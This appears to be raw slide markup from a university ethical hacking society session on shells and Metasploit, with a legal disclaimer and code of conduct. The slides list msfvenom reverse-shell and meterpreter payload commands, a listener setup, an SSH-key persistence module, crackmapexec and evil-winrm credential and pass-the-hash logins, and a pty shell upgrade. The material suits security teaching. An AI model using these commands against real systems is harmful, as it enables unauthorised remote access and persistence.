              <a:rPr lang="en-GB"/>
              <a:t>compatibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> and scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p26"/>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What is Metasploit?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highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>udo msfdb start</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>sfconsole -&gt; use exploit/multi/handler -&gt; options -&gt; set [option] [argument] -&gt; exploit -j</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/shell/reverse_tcp LHOST=[ip] LPORT=9002 -f elf -o reverse_shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[ip] LPORT=9001 -f elf -o reverse_met</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p27"/>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Let’s look around Metasploit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post/linux/manage/sshkey_persistence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Now let’s see if we can see a hidden service and connect to it!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p28"/>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Once we have a linux shell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solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>rackmapexec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>--help</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>crackmapexec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>smb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[ip]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t> -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[user name or file]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[password or file]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>crackmapexec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>winrm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[ip]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t> -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[user name or file]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[password or file]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" u="sng"/>
            </a:br>
            <a:endParaRPr u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>evil-winrm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>-i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[ip]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t> -U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[username]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t> -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[password]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>evil-winrm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>-i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[ip]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t> -U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[username]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t> -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>[password_hash]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>-c “import pty; pty.spawn(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>/bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>’)”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p29"/>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Useful commands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265500" y="238625"/>
            <a:ext cx="4115700" cy="247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Upcoming Sessions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p3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What’s up next?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.shefesh.com/sessions</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;p3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16 Nov 2020 – 🧾 Enumeration 🧾</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>23 Nov 2020 – ␛ Privilege Escalation ␛</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>30 Nov 2020 – 🔎 Open-Source Intelligence🔎</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>07 Dec 2020 – 🔓 Hack The Box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The skills taught in these sessions allow identification and exploitation of security vulnerabilities in systems. We strive to give you a place to practice legally, and can point you to other places to practice. These skills should not be used on systems where you do not have explicit permission from the owner of the system. It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VERY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> easy to end up in breach of relevant laws, and we can accept no responsibility for anything you do with the skills learnt here. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>If we have reason to believe that you are utilising these skills against systems where you are not authorised you will be banned from our events, and if necessary the relevant authorities will be alerted. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remember, if you have any doubts as to if something is legal or authorised, just don't do it until you are able to confirm you are allowed to.</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63" name="Google Shape;63;p1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Legal Bit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Any Questions?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="180" name="Google Shape;180;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2998650" y="1061775"/>
            <a:ext cx="3146700" cy="3146700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2740350" y="4208475"/>
            <a:ext cx="3663300" cy="57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300">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>www.shefesh.com</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Thanks for coming!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">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Before proceeding past this point you must read and agree to our Code of Conduct - this is a requirement from the University for us to operate as a society. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>If you have any doubts or need anything clarified, please ask a member of the committee.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Breaching the Code of Conduct = immediate ejection and further consequences.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Code of Conduct can be found at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://shefesh.com/downloads/SESH%20Code%20of%20Conduct.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p1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Code of Conduct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What is a shell?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="67254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GB" sz="1500"/>
              <a:t>A shell is a way that the user can interface with the operating system. Typically in linux you will use either ‘bash’ or ‘sh’. A windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>equivalent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t> would be cmd or powershell.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>The kernel is an integral part of an operating system that handles interactions between the hardware and software parts of the computer.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>A shell is a bit of software that wraps around the kernel and allows the user to interact with the kernel and issue commands to be executed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>There are multiple types of shell in Linux such as BASH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>SH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>, CSH, ZSH among others</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Google Shape;76;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7123150" y="1152475"/>
            <a:ext cx="1874225" cy="1482350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Google Shape;77;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924500" y="2703299"/>
            <a:ext cx="2138952" cy="16574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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3834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GB" sz="1500"/>
              <a:t>The ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
